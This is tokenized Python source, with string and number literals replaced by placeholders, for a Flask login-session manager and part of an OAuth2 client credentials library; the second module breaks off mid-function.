<s> '''<STR_LIT>''' <EOL> __version_info__ = ( '<STR_LIT:0>' , '<STR_LIT:2>' , '<STR_LIT>' ) <EOL> __version__ = '<STR_LIT:.>' . join ( __version_info__ ) <EOL> __author__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' <EOL> __all__ = [ '<STR_LIT>' ] <EOL> from flask import ( _request_ctx_stack , abort , current_app , flash , redirect , <EOL> request , session , url_for ) <EOL> from flask . signals import Namespace <EOL> from werkzeug . local import LocalProxy <EOL> from werkzeug . security import safe_str_cmp <EOL> from werkzeug . urls import url_decode , url_encode <EOL> from datetime import datetime , timedelta <EOL> from functools import wraps <EOL> from hashlib import sha1 , md5 <EOL> import hmac <EOL> import warnings <EOL> import sys <EOL> if sys . version < '<STR_LIT:3>' : <EOL> from urlparse import urlparse , urlunparse <EOL> else : <EOL> from urllib . parse import urlparse , urlunparse <EOL> unicode = str <EOL> _signals = Namespace ( ) <EOL> current_user = LocalProxy ( lambda : _get_user ( ) or <EOL> current_app . login_manager . anonymous_user ( ) ) <EOL> COOKIE_NAME = '<STR_LIT>' <EOL> COOKIE_DURATION = timedelta ( days = <NUM_LIT> ) <EOL> COOKIE_SECURE = None <EOL> COOKIE_HTTPONLY = False <EOL> LOGIN_MESSAGE = u'<STR_LIT>' <EOL> LOGIN_MESSAGE_CATEGORY = '<STR_LIT:message>' <EOL> REFRESH_MESSAGE = u'<STR_LIT>' <EOL> REFRESH_MESSAGE_CATEGORY = '<STR_LIT:message>' <EOL> class LoginManager ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , app = None , add_context_processor = True ) : <EOL> self . anonymous_user = AnonymousUserMixin <EOL> self . login_view = None <EOL> self . login_message = LOGIN_MESSAGE <EOL> self . login_message_category = LOGIN_MESSAGE_CATEGORY <EOL> self . refresh_view = None <EOL> self . needs_refresh_message = REFRESH_MESSAGE <EOL> self . needs_refresh_message_category = REFRESH_MESSAGE_CATEGORY <EOL> self . session_protection = '<STR_LIT>' <EOL> self . token_callback = None <EOL> self . user_callback = None <EOL> self . unauthorized_callback = None <EOL> self . needs_refresh_callback = None <EOL> if app is not None : <EOL> self . init_app ( app , add_context_processor ) <EOL> def setup_app ( self , app , add_context_processor = True ) : <EOL> '''<STR_LIT>''' <EOL> warnings . warn ( '<STR_LIT>' , <EOL> DeprecationWarning ) <EOL> self . init_app ( app , add_context_processor ) <EOL> def init_app ( self , app , add_context_processor = True ) : <EOL> '''<STR_LIT>''' <EOL> app . login_manager = self <EOL> app . before_request ( self . _load_user ) <EOL> app . after_request ( self . _update_remember_cookie ) <EOL> self . _login_disabled = app . config . get ( '<STR_LIT>' , <EOL> app . config . get ( '<STR_LIT>' , False ) ) <EOL> if add_context_processor : <EOL> app . context_processor ( _user_context_processor ) <EOL> def unauthorized ( self ) : <EOL> '''<STR_LIT>''' <EOL> user_unauthorized . send ( current_app . _get_current_object ( ) ) <EOL> if self . unauthorized_callback : <EOL> return self . unauthorized_callback ( ) <EOL> if not self . login_view : <EOL> abort ( <NUM_LIT> ) <EOL> if self . login_message : <EOL> flash ( self . login_message , category = self . login_message_category ) <EOL> return redirect ( login_url ( self . login_view , request . url ) ) <EOL> def user_loader ( self , callback ) : <EOL> '''<STR_LIT>''' <EOL> self . user_callback = callback <EOL> return callback <EOL> def token_loader ( self , callback ) : <EOL> '''<STR_LIT>''' <EOL> self . token_callback = callback <EOL> return callback <EOL> def unauthorized_handler ( self , callback ) : <EOL> '''<STR_LIT>''' <EOL> self . unauthorized_callback = callback <EOL> return callback <EOL> def needs_refresh_handler ( self , callback ) : <EOL> '''<STR_LIT>''' <EOL> self . needs_refresh_callback = callback <EOL> return callback <EOL> def needs_refresh ( self ) : <EOL> '''<STR_LIT>''' <EOL> user_needs_refresh . send ( current_app . _get_current_object ( ) ) <EOL> if self . needs_refresh_callback : <EOL> return self . needs_refresh_callback ( ) <EOL> if not self . refresh_view : <EOL> abort ( <NUM_LIT> ) <EOL> flash ( self . needs_refresh_message , <EOL> category = self . needs_refresh_message_category ) <EOL> return redirect ( login_url ( self . refresh_view , request . url ) ) <EOL> def reload_user ( self ) : <EOL> ctx = _request_ctx_stack . top <EOL> user_id = session . get ( '<STR_LIT>' ) <EOL> if user_id is None : <EOL> ctx . user = self . anonymous_user ( ) <EOL> else : <EOL> user = self . user_callback ( user_id ) <EOL> if user is None : <EOL> logout_user ( ) <EOL> else : <EOL> ctx . user = user <EOL> def _load_user ( self ) : <EOL> config = current_app . config <EOL> if config . get ( '<STR_LIT>' , self . session_protection ) : <EOL> deleted = self . _session_protection ( ) <EOL> if deleted : <EOL> self . reload_user ( ) <EOL> return <EOL> cookie_name = config . get ( '<STR_LIT>' , COOKIE_NAME ) <EOL> if cookie_name in request . cookies and '<STR_LIT>' not in session : <EOL> return self . _load_from_cookie ( request . cookies [ cookie_name ] ) <EOL> return self . reload_user ( ) <EOL> def _session_protection ( self ) : <EOL> sess = session . _get_current_object ( ) <EOL> ident = _create_identifier ( ) <EOL> if '<STR_LIT>' not in sess : <EOL> sess [ '<STR_LIT>' ] = ident <EOL> elif ident != sess [ '<STR_LIT>' ] : <EOL> app = current_app . _get_current_object ( ) <EOL> mode = app . config . get ( '<STR_LIT>' , <EOL> self . session_protection ) <EOL> if mode == '<STR_LIT>' or sess . permanent : <EOL> sess [ '<STR_LIT>' ] = False <EOL> session_protected . send ( app ) <EOL> return False <EOL> elif mode == '<STR_LIT>' : <EOL> sess . clear ( ) <EOL> sess [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> session_protected . send ( app ) <EOL> return True <EOL> return False <EOL> def _load_from_cookie ( self , cookie ) : <EOL> if self . token_callback : <EOL> user = self . token_callback ( cookie ) <EOL> if user is not None : <EOL> session [ '<STR_LIT>' ] = user . get_id ( ) <EOL> session [ '<STR_LIT>' ] = False <EOL> _request_ctx_stack . top . user = user <EOL> else : <EOL> self . reload_user ( ) <EOL> else : <EOL> user_id = decode_cookie ( cookie ) <EOL> if user_id is not None : <EOL> session [ '<STR_LIT>' ] = user_id <EOL> session [ '<STR_LIT>' ] = False <EOL> self . reload_user ( ) <EOL> app = current_app . _get_current_object ( ) <EOL> user_loaded_from_cookie . send ( app , user = _get_user ( ) ) <EOL> def _update_remember_cookie ( self , response ) : <EOL> if '<STR_LIT>' in session : <EOL> operation = session . pop ( '<STR_LIT>' , None ) <EOL> if operation == '<STR_LIT>' and '<STR_LIT>' in session : <EOL> self . _set_cookie ( response ) <EOL> elif operation == '<STR_LIT>' : <EOL> self . _clear_cookie ( response ) <EOL> return response <EOL> def _set_cookie ( self , response ) : <EOL> config = current_app . config <EOL> cookie_name = config . get ( '<STR_LIT>' , COOKIE_NAME ) <EOL> duration = config . get ( '<STR_LIT>' , COOKIE_DURATION ) <EOL> domain = config . get ( '<STR_LIT>' ) <EOL> secure = config . get ( '<STR_LIT>' , COOKIE_SECURE ) <EOL> httponly = config . get ( '<STR_LIT>' , COOKIE_HTTPONLY ) <EOL> if self . token_callback : <EOL> data = current_user . get_auth_token ( ) <EOL> else : <EOL> data = encode_cookie ( str ( session [ '<STR_LIT>' ] ) ) <EOL> expires = datetime . utcnow ( ) + duration <EOL> response . set_cookie ( cookie_name , <EOL> value = data , <EOL> expires = expires , <EOL> domain = domain , <EOL> secure = secure , <EOL> httponly = httponly ) <EOL> def _clear_cookie ( self , response ) : <EOL> config = current_app . config <EOL> cookie_name = config . get ( '<STR_LIT>' , COOKIE_NAME ) <EOL> domain = config . get ( '<STR_LIT>' ) <EOL> response . delete_cookie ( cookie_name , domain = domain ) <EOL> class UserMixin ( object ) : <EOL> '''<STR_LIT>''' <EOL> def is_active ( self ) : <EOL> return True <EOL> def is_authenticated ( self ) : <EOL> return True <EOL> def is_anonymous ( self ) : <EOL> return False <EOL> def get_id ( self ) : <EOL> try : <EOL> return unicode ( self . id ) <EOL> except AttributeError : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def __eq__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( other , UserMixin ) : <EOL> return self . get_id ( ) == other . get_id ( ) <EOL> return NotImplemented <EOL> def __ne__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> equal = self . __eq__ ( other ) <EOL> if equal is NotImplemented : <EOL> return NotImplemented <EOL> return not equal <EOL> class AnonymousUserMixin ( object ) : <EOL> '''<STR_LIT>''' <EOL> def is_authenticated ( self ) : <EOL> return False <EOL> def is_active ( self ) : <EOL> return False <EOL> def is_anonymous ( self ) : <EOL> return True <EOL> def get_id ( self ) : <EOL> return <EOL> def encode_cookie ( payload ) : <EOL> '''<STR_LIT>''' <EOL> return u'<STR_LIT>' . format ( payload , _cookie_digest ( payload ) ) <EOL> def decode_cookie ( cookie ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> payload , digest = cookie . rsplit ( u'<STR_LIT:|>' , <NUM_LIT:1> ) <EOL> if hasattr ( digest , '<STR_LIT>' ) : <EOL> digest = digest . decode ( '<STR_LIT:ascii>' ) <EOL> except ValueError : <EOL> return <EOL> if safe_str_cmp ( _cookie_digest ( payload ) , digest ) : <EOL> return payload <EOL> def make_next_param ( login_url , current_url ) : <EOL> '''<STR_LIT>''' <EOL> l = urlparse ( login_url ) <EOL> c = urlparse ( current_url ) <EOL> if ( not l . scheme or l . scheme == c . scheme ) and ( not l . netloc or l . netloc == c . netloc ) : <EOL> return urlunparse ( ( '<STR_LIT>' , '<STR_LIT>' , c . path , c . params , c . query , '<STR_LIT>' ) ) <EOL> return current_url <EOL> def login_url ( login_view , next_url = None , next_field = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if login_view . startswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:/>' ) ) : <EOL> base = login_view <EOL> else : <EOL> base = url_for ( login_view ) <EOL> if next_url is None : <EOL> return base <EOL> parts = list ( urlparse ( base ) ) <EOL> md = url_decode ( parts [ <NUM_LIT:4> ] ) <EOL> md [ next_field ] = make_next_param ( base , next_url ) <EOL> parts [ <NUM_LIT:4> ] = url_encode ( md , sort = True ) <EOL> return urlunparse ( parts ) <EOL> def make_secure_token ( * args , ** options ) : <EOL> '''<STR_LIT>''' <EOL> key = options . get ( '<STR_LIT:key>' ) <EOL> if key is None : <EOL> key = current_app . config [ '<STR_LIT>' ] <EOL> if hasattr ( key , '<STR_LIT>' ) : <EOL> key = key . encode ( '<STR_LIT:utf-8>' ) <EOL> l = [ s if isinstance ( s , bytes ) else s . encode ( '<STR_LIT:utf-8>' ) for s in args ] <EOL> payload = b'<STR_LIT>' . join ( l ) <EOL> token_value = hmac . new ( key , payload , sha1 ) . hexdigest ( ) <EOL> if hasattr ( token_value , '<STR_LIT>' ) : <EOL> token_value = token_value . decode ( '<STR_LIT:utf-8>' ) <EOL> return token_value <EOL> def login_fresh ( ) : <EOL> '''<STR_LIT>''' <EOL> return session . get ( '<STR_LIT>' , False ) <EOL> def login_user ( user , remember = False , force = False ) : <EOL> '''<STR_LIT>''' <EOL> if not force and not user . is_active ( ) : <EOL> return False <EOL> user_id = user . get_id ( ) <EOL> session [ '<STR_LIT>' ] = user_id <EOL> session [ '<STR_LIT>' ] = True <EOL> if remember : <EOL> session [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> _request_ctx_stack . top . user = user <EOL> user_logged_in . send ( current_app . _get_current_object ( ) , user = _get_user ( ) ) <EOL> return True <EOL> def logout_user ( ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in session : <EOL> session . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in session : <EOL> session . pop ( '<STR_LIT>' ) <EOL> cookie_name = current_app . config . get ( '<STR_LIT>' , COOKIE_NAME ) <EOL> if cookie_name in request . cookies : <EOL> session [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> user = _get_user ( ) <EOL> if user and not user . is_anonymous ( ) : <EOL> user_logged_out . send ( current_app . _get_current_object ( ) , user = user ) <EOL> current_app . login_manager . reload_user ( ) <EOL> return True <EOL> def confirm_login ( ) : <EOL> '''<STR_LIT>''' <EOL> session [ '<STR_LIT>' ] = True <EOL> session [ '<STR_LIT>' ] = _create_identifier ( ) <EOL> user_login_confirmed . send ( current_app . _get_current_object ( ) ) <EOL> def login_required ( func ) : <EOL> '''<STR_LIT>''' <EOL> @ wraps ( func ) <EOL> def decorated_view ( * args , ** kwargs ) : <EOL> if current_app . login_manager . _login_disabled : <EOL> return func ( * args , ** kwargs ) <EOL> elif not current_user . is_authenticated ( ) : <EOL> return current_app . login_manager . unauthorized ( ) <EOL> return func ( * args , ** kwargs ) <EOL> return decorated_view <EOL> def fresh_login_required ( func ) : <EOL> '''<STR_LIT>''' <EOL> @ wraps ( func ) <EOL> def decorated_view ( * args , ** kwargs ) : <EOL> if current_app . login_manager . _login_disabled : <EOL> return func ( * args , ** kwargs ) <EOL> elif not current_user . is_authenticated ( ) : <EOL> return current_app . login_manager . unauthorized ( ) <EOL> elif not login_fresh ( ) : <EOL> return current_app . login_manager . needs_refresh ( ) <EOL> return func ( * args , ** kwargs ) <EOL> return decorated_view <EOL> def _get_user ( ) : <EOL> return getattr ( _request_ctx_stack . top , '<STR_LIT:user>' , None ) <EOL> def _cookie_digest ( payload , key = None ) : <EOL> if key is None : <EOL> key = current_app . config [ '<STR_LIT>' ] <EOL> if hasattr ( key , '<STR_LIT>' ) : <EOL> key = key . encode ( '<STR_LIT:utf-8>' ) <EOL> return hmac . new ( key , payload . encode ( '<STR_LIT:utf-8>' ) , sha1 ) . hexdigest ( ) <EOL> def _get_remote_addr ( ) : <EOL> return request . headers . get ( '<STR_LIT>' , request . remote_addr ) <EOL> def _create_identifier ( ) : <EOL> base = '<STR_LIT>' . format ( _get_remote_addr ( ) , <EOL> request . headers . get ( '<STR_LIT>' ) ) <EOL> if str is bytes : <EOL> base = unicode ( base , '<STR_LIT:utf-8>' , errors = '<STR_LIT:replace>' ) <EOL> h = md5 ( ) <EOL> h . update ( base . encode ( '<STR_LIT:utf8>' ) ) <EOL> return h . hexdigest ( ) <EOL> def _user_context_processor ( ) : <EOL> return dict ( current_user = _get_user ( ) ) <EOL> user_logged_in = _signals . signal ( '<STR_LIT>' ) <EOL> user_logged_out = _signals . signal ( '<STR_LIT>' ) <EOL> user_loaded_from_cookie = _signals . signal ( '<STR_LIT>' ) <EOL> user_login_confirmed = _signals . signal ( '<STR_LIT>' ) <EOL> user_unauthorized = _signals . signal ( '<STR_LIT>' ) <EOL> user_needs_refresh = _signals . signal ( '<STR_LIT>' ) <EOL> session_protected = _signals . signal ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import base64 <EOL> import clientsecrets <EOL> import copy <EOL> import datetime <EOL> import httplib2 <EOL> import logging <EOL> import os <EOL> import sys <EOL> import time <EOL> import urllib <EOL> import urlparse <EOL> from oauth2client import GOOGLE_AUTH_URI <EOL> from oauth2client import GOOGLE_REVOKE_URI <EOL> from oauth2client import GOOGLE_TOKEN_URI <EOL> from oauth2client import util <EOL> from oauth2client . anyjson import simplejson <EOL> HAS_OPENSSL = False <EOL> HAS_CRYPTO = False <EOL> try : <EOL> from oauth2client import crypt <EOL> HAS_CRYPTO = True <EOL> if crypt . OpenSSLVerifier is not None : <EOL> HAS_OPENSSL = True <EOL> except ImportError : <EOL> pass <EOL> try : <EOL> from urlparse import parse_qsl <EOL> except ImportError : <EOL> from cgi import parse_qsl <EOL> logger = logging . getLogger ( __name__ ) <EOL> EXPIRY_FORMAT = '<STR_LIT>' <EOL> ID_TOKEN_VERIFICATON_CERTS = '<STR_LIT>' <EOL> OOB_CALLBACK_URN = '<STR_LIT>' <EOL> REFRESH_STATUS_CODES = [ <NUM_LIT> ] <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class FlowExchangeError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class AccessTokenRefreshError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class TokenRevokeError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class UnknownClientSecretsFlowError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class AccessTokenCredentialsError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class VerifyJwtTokenError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class NonAsciiHeaderError ( Error ) : <EOL> """<STR_LIT>""" <EOL> def _abstract ( ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class MemoryCache ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . cache = { } <EOL> def get ( self , key ) : <EOL> return self . cache . get ( key ) <EOL> def set ( self , key , value ) : <EOL> self . cache [ key ] = value <EOL> def delete ( self , key ) : <EOL> self . cache . pop ( key , None ) <EOL> class Credentials ( object ) : <EOL> """<STR_LIT>""" <EOL> NON_SERIALIZED_MEMBERS = [ '<STR_LIT:store>' ] <EOL> def authorize ( self , http ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def refresh ( self , http ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def revoke ( self , http ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def apply ( self , headers ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def _to_json ( self , strip ) : <EOL> """<STR_LIT>""" <EOL> t = type ( self ) <EOL> d = copy . copy ( self . __dict__ ) <EOL> for member in strip : <EOL> if member in d : <EOL> del d [ member ] <EOL> if '<STR_LIT>' in d and isinstance ( d [ '<STR_LIT>' ] , datetime . datetime ) : <EOL> d [ '<STR_LIT>' ] = d [ '<STR_LIT>' ] . strftime ( EXPIRY_FORMAT ) <EOL> d [ '<STR_LIT>' ] = t . __name__ <EOL> d [ '<STR_LIT>' ] = t . __module__ <EOL> return simplejson . dumps ( d ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _to_json ( Credentials . NON_SERIALIZED_MEMBERS ) <EOL> @ classmethod <EOL> def new_from_json ( cls , s ) : <EOL> """<STR_LIT>""" <EOL> data = simplejson . loads ( s ) <EOL> module = data [ '<STR_LIT>' ] <EOL> try : <EOL> m = __import__ ( module ) <EOL> except ImportError : <EOL> module = module . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> m = __import__ ( module ) <EOL> m = __import__ ( module , fromlist = module . split ( '<STR_LIT:.>' ) [ : - <NUM_LIT:1> ] ) <EOL> kls = getattr ( m , data [ '<STR_LIT>' ] ) <EOL> from_json = getattr ( kls , '<STR_LIT>' ) <EOL> return from_json ( s ) <EOL> @ classmethod <EOL> def from_json ( cls , s ) : <EOL> """<STR_LIT>""" <EOL> return Credentials ( ) <EOL> class Flow ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Storage ( object ) : <EOL> """<STR_LIT>""" <EOL> def acquire_lock ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def release_lock ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def locked_get ( self ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def locked_put ( self , credentials ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def locked_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> self . acquire_lock ( ) <EOL> try : <EOL> return self . locked_get ( ) <EOL> finally : <EOL> self . release_lock ( ) <EOL> def put ( self , credentials ) : <EOL> """<STR_LIT>""" <EOL> self . acquire_lock ( ) <EOL> try : <EOL> self . locked_put ( credentials ) <EOL> finally : <EOL> self . release_lock ( ) <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> self . acquire_lock ( ) <EOL> try : <EOL> return self . locked_delete ( ) <EOL> finally : <EOL> self . release_lock ( ) <EOL> def clean_headers ( headers ) : <EOL> """<STR_LIT>""" <EOL> clean = { } <EOL> try : <EOL> for k , v in headers . iteritems ( ) : <EOL> clean [ str ( k ) ] = str ( v ) <EOL> except UnicodeEncodeError : <EOL> raise NonAsciiHeaderError ( k + '<STR_LIT>' + v ) <EOL> return clean <EOL> def _update_query_params ( uri , params ) : <EOL> """<STR_LIT>""" <EOL> parts = list ( urlparse . urlparse ( uri ) ) <EOL> query_params = dict ( parse_qsl ( parts [ <NUM_LIT:4> ] ) ) <EOL> query_params . update ( params ) <EOL> parts [ <NUM_LIT:4> ] = urllib . urlencode ( query_params ) <EOL> return urlparse . urlunparse ( parts ) <EOL> class OAuth2Credentials ( Credentials ) : <EOL> """<STR_LIT>""" <EOL> @ util . positional ( <NUM_LIT:8> ) <EOL> def __init__ ( self , access_token , client_id , client_secret , refresh_token , <EOL> token_expiry , token_uri , user_agent , revoke_uri = None , <EOL> id_token = None , token_response = None ) : <EOL> """<STR_LIT>""" <EOL> self . access_token = access_token <EOL> self . client_id = client_id <EOL> self . client_secret = client_secret <EOL> self . refresh_token = refresh_token <EOL> self . store = None <EOL> self . token_expiry = token_expiry <EOL> self . token_uri = token_uri <EOL> self . user_agent = user_agent <EOL> self . revoke_uri = revoke_uri <EOL> self . id_token = id_token <EOL> self . token_response = token_response <EOL> self . invalid = False <EOL> def authorize ( self , http ) : <EOL> """<STR_LIT>""" <EOL> request_orig = http . request <EOL> @ util . positional ( <NUM_LIT:1> ) <EOL> def new_request ( uri , method = '<STR_LIT:GET>' , body = None , headers = None , <EOL> redirections = httplib2 . DEFAULT_MAX_REDIRECTS , <EOL> connection_type = None ) : <EOL> if not self . access_token : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . _refresh ( request_orig ) <EOL> if headers is None : <EOL> headers = { } <EOL> self . apply ( headers ) <EOL> if self . user_agent is not None : <EOL> if '<STR_LIT>' in headers : <EOL> headers [ '<STR_LIT>' ] = self . user_agent + '<STR_LIT:U+0020>' + headers [ '<STR_LIT>' ] <EOL> else : <EOL> headers [ '<STR_LIT>' ] = self . user_agent <EOL> resp , content = request_orig ( uri , method , body , clean_headers ( headers ) , <EOL> redirections , connection_type ) <EOL> if resp . status in REFRESH_STATUS_CODES : <EOL> logger . info ( '<STR_LIT>' % str ( resp . status ) ) <EOL> self . _refresh ( request_orig ) <EOL> self . apply ( headers ) <EOL> return request_orig ( uri , method , body , clean_headers ( headers ) , <EOL> redirections , connection_type ) <EOL> else : <EOL> return ( resp , content ) <EOL> http . request = new_request <EOL> setattr ( http . request , '<STR_LIT>' , self ) <EOL> return http <EOL> def refresh ( self , http ) : <EOL> """<STR_LIT>""" <EOL> self . _refresh ( http . request ) <EOL> def revoke ( self , http ) : <EOL> """<STR_LIT>""" <EOL> self . _revoke ( http . request ) <EOL> def apply ( self , headers ) : <EOL> """<STR_LIT>""" <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' + self . access_token <EOL> def to_json ( self ) : <EOL> return self . _to_json ( Credentials . NON_SERIALIZED_MEMBERS ) <EOL> @ classmethod <EOL> def from_json ( cls , s ) : <EOL> """<STR_LIT>""" <EOL> data = simplejson . loads ( s ) <EOL> if '<STR_LIT>' in data and not isinstance ( data [ '<STR_LIT>' ] , <EOL> datetime . datetime ) : <EOL> try : <EOL> data [ '<STR_LIT>' ] = datetime . datetime . strptime ( <EOL> data [ '<STR_LIT>' ] , EXPIRY_FORMAT ) <EOL> except : <EOL> data [ '<STR_LIT>' ] = None <EOL> retval = cls ( <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> revoke_uri = data . get ( '<STR_LIT>' , None ) , <EOL> id_token = data . get ( '<STR_LIT>' , None ) , <EOL> token_response = data . get ( '<STR_LIT>' , None ) ) <EOL> retval . invalid = data [ '<STR_LIT>' ] <EOL> return retval <EOL> @ property <EOL> def access_token_expired ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . invalid : <EOL> return True <EOL> if not self . token_expiry : <EOL> return False <EOL> now = datetime . datetime . utcnow ( ) <EOL> if now >= self . token_expiry : <EOL> logger . info ( '<STR_LIT>' , <EOL> now , self . token_expiry ) <EOL> return True <EOL> return False <EOL> def set_store ( self , store ) : <EOL> """<STR_LIT>""" <EOL> self . store = store <EOL> def _updateFromCredential ( self , other ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( other . __getstate__ ( ) ) <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> d = copy . copy ( self . __dict__ ) <EOL> del d [ '<STR_LIT:store>' ] <EOL> return d <EOL> def __setstate__ ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( state ) <EOL> self . store = None <EOL> def _generate_refresh_request_body ( self ) : <EOL> """<STR_LIT>""" <EOL> body = urllib . urlencode ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : self . client_secret , <EOL> '<STR_LIT>' : self . refresh_token , <EOL> } ) <EOL> return body <EOL> def _generate_refresh_request_headers ( self ) : <EOL> """<STR_LIT>""" <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if self . user_agent is not None : <EOL> headers [ '<STR_LIT>' ] = self . user_agent <EOL> return headers <EOL> def _refresh ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> if not self . store : <EOL> self . _do_refresh_request ( http_request ) <EOL> else : <EOL> self . store . acquire_lock ( ) <EOL> try : <EOL> new_cred = self . store . locked_get ( ) <EOL> if ( new_cred and not new_cred . invalid and <EOL> new_cred . access_token != self . access_token ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . _updateFromCredential ( new_cred ) <EOL> else : <EOL> self . _do_refresh_request ( http_request ) <EOL> finally : <EOL> self . store . release_lock ( ) <EOL> def _do_refresh_request ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> body = self . _generate_refresh_request_body ( ) <EOL> headers = self . _generate_refresh_request_headers ( ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> resp , content = http_request ( <EOL> self . token_uri , method = '<STR_LIT:POST>' , body = body , headers = headers ) <EOL> if resp . status == <NUM_LIT:200> : <EOL> d = simplejson . loads ( content ) <EOL> self . token_response = d <EOL> self . access_token = d [ '<STR_LIT>' ] <EOL> self . refresh_token = d . get ( '<STR_LIT>' , self . refresh_token ) <EOL> if '<STR_LIT>' in d : <EOL> self . token_expiry = datetime . timedelta ( <EOL> seconds = int ( d [ '<STR_LIT>' ] ) ) + datetime . datetime . utcnow ( ) <EOL> else : <EOL> self . token_expiry = None <EOL> if self . store : <EOL> self . store . locked_put ( self ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' % content ) <EOL> error_msg = '<STR_LIT>' % resp [ '<STR_LIT:status>' ] <EOL> try : <EOL> d = simplejson . loads ( content ) <EOL> if '<STR_LIT:error>' in d : <EOL> error_msg = d [ '<STR_LIT:error>' ] <EOL> self . invalid = True <EOL> if self . store : <EOL> self . store . locked_put ( self ) <EOL> except StandardError : <EOL> pass <EOL> raise AccessTokenRefreshError ( error_msg ) <EOL> def _revoke ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> self . _do_revoke ( http_request , self . refresh_token ) <EOL> def _do_revoke ( self , http_request , token ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> query_params = { '<STR_LIT>' : token } <EOL> token_revoke_uri = _update_query_params ( self . revoke_uri , query_params ) <EOL> resp , content = http_request ( token_revoke_uri ) <EOL> if resp . status == <NUM_LIT:200> : <EOL> self . invalid = True <EOL> else : <EOL> error_msg = '<STR_LIT>' % resp . status <EOL> try : <EOL> d = simplejson . loads ( content ) <EOL> if '<STR_LIT:error>' in d : <EOL> error_msg = d [ '<STR_LIT:error>' ] <EOL> except StandardError : <EOL> pass <EOL> raise TokenRevokeError ( error_msg ) <EOL> if self . store : <EOL> self . store . delete ( ) <EOL> class AccessTokenCredentials ( OAuth2Credentials ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , access_token , user_agent , revoke_uri = None ) : <EOL> """<STR_LIT>""" <EOL> super ( AccessTokenCredentials , self ) . __init__ ( <EOL> access_token , <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> user_agent , <EOL> revoke_uri = revoke_uri ) <EOL> @ classmethod <EOL> def from_json ( cls , s ) : <EOL> data = simplejson . loads ( s ) <EOL> retval = AccessTokenCredentials ( <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] ) <EOL> return retval <EOL> def _refresh ( self , http_request ) : <EOL> raise AccessTokenCredentialsError ( <EOL> '<STR_LIT>' ) <EOL> def _revoke ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> self . _do_revoke ( http_request , self . access_token ) <EOL> class AssertionCredentials ( OAuth2Credentials ) : <EOL> """<STR_LIT>""" <EOL> @ util . positional ( <NUM_LIT:2> ) <EOL> def __init__ ( self , assertion_type , user_agent = None , <EOL> token_uri = GOOGLE_TOKEN_URI , <EOL> revoke_uri = GOOGLE_REVOKE_URI , <EOL> ** unused_kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( AssertionCredentials , self ) . __init__ ( <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> token_uri , <EOL> user_agent , <EOL> revoke_uri = revoke_uri ) <EOL> self . assertion_type = assertion_type <EOL> def _generate_refresh_request_body ( self ) : <EOL> assertion = self . _generate_assertion ( ) <EOL> body = urllib . urlencode ( { <EOL> 